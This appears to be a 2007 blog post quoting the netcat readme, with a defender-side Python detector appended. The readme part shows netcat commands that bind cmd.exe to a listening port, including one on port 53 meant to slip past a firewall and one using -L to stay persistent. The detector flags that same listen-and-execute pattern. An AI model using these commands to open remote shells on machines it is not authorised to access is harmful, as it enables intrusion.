Friday, July 27, 2007

netcat

From http://www.vulnwatch.org/netcat/readment.txt

To use Netcat to retrieve the home page of a web site use the command:
nc -v www.website.com 80 < get.txt

You will see Netcat make a connection to port 80, send the text contained
in the file get.txt, and then output the web server's response to stdout.
The -v is for verbose. It tells you a little info about the connection
when it starts.

So the leftward facing arrow ( < ) means "Inject the contents of get.txt into the connection just opened to website.com port 80". Inside the get.txt file is "GET / HTTP/1.0" and a couple of returns. This will get the webpage.

A far more exciting thing to do is to get a quick shell going on a remote
machine by using the -l or "listen" option and the -e or "execute"
option. You run Netcat listening on a particular port for a connection.
When a connection is made, Netcat executes the program of your choice
and connects the stdin and stdout of the program to the network connection.

nc -l -p 23 -t -e cmd.exe

will get Netcat listening on port 23 (telnet). When it gets connected to
by a client it will spawn a shell (cmd.exe). The -t option tells Netcat
to handle any telnet negotiation the client might expect.

This will allow you to telnet to the machine you have Netcat listening on
and get a cmd.exe shell when you connect. You could just as well use
Netcat instead of telnet:

nc xxx.xxx.xxx.xxx 23

The -l means "listen". The -p means "port".

The beauty of Netcat really shines when you realize that you can get it
listening on ANY port doing the same thing. Do a little exploring and
see if the firewall you may be behind lets port 53 through. Run Netcat
listening behind the firewall on port 53.

nc -L -p 53 -e cmd.exe

Then from outside the firewall connect to the listening machine:

nc -v xxx.xxx.xxx.xx 53

If you get a command prompt then you are executing commands on the
listening machine. Use 'exit' at the command prompt for a clean
disconnect. The -L (note the capital L) option will restart Netcat with
the same command line when the connection is terminated. This way you can
connect over and over to the same Netcat process.
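As an added example (not part of the readme or of Netcat itself): a defender-side check that parses process command lines for the -l/-L, -p and -e combination described above and rates how much attention a line deserves. The binary names other than nc and the set of value-taking options are assumptions.

```python
import os
import shlex
from dataclasses import dataclass
from typing import Optional

# Names treated as netcat: "nc" is the name used in the text above; the rest are
# an assumption about other builds and Windows file names.
NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe", "ncat", "ncat.exe"}
# Options that consume an argument (-p port, -e program, -w timeout, ...), so the
# parser knows when the next token is a value rather than a host. Assumed set.
TAKES_VALUE = {"p", "e", "w", "s", "o", "g", "G", "i"}

@dataclass
class Finding:
    listens: bool           # -l or -L present
    persistent: bool        # -L: restart with the same command line after disconnect
    port: Optional[str]     # value of -p, if given
    program: Optional[str]  # value of -e, if given
    @property
    def severity(self) -> str:
        if self.program is None:
            return "info"   # plain client or listener, no program wired to the socket
        return "high" if self.listens else "medium"

def analyze(cmdline: str) -> Optional[Finding]:
    """Parse one process command line; None means it is not netcat at all."""
    tokens = shlex.split(cmdline, posix=True)  # use posix=False for backslash paths
    if not tokens or os.path.basename(tokens[0]).lower() not in NETCAT_NAMES:
        return None
    f = Finding(listens=False, persistent=False, port=None, program=None)
    i = 1
    while i < len(tokens):
        tok, i = tokens[i], i + 1
        if not tok.startswith("-") or tok == "-":
            continue  # positional host/port arguments
        for pos, ch in enumerate(tok[1:], start=1):
            if ch == "l":
                f.listens = True
            elif ch == "L":
                f.listens = f.persistent = True
            elif ch in TAKES_VALUE:
                # Value is the rest of this cluster (-p53) or the next token (-p 53).
                value = tok[pos + 1:]
                if not value and i < len(tokens):
                    value, i = tokens[i], i + 1
                if ch == "p":
                    f.port = value or None
                elif ch == "e":
                    f.program = value or None
                break  # whatever followed the option letter was its value
    return f
```

Feed it the command-line column of your process inventory; a "high" finding is a listener with a program attached, which is exactly the `-l -p 23 -e cmd.exe` shape discussed above.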
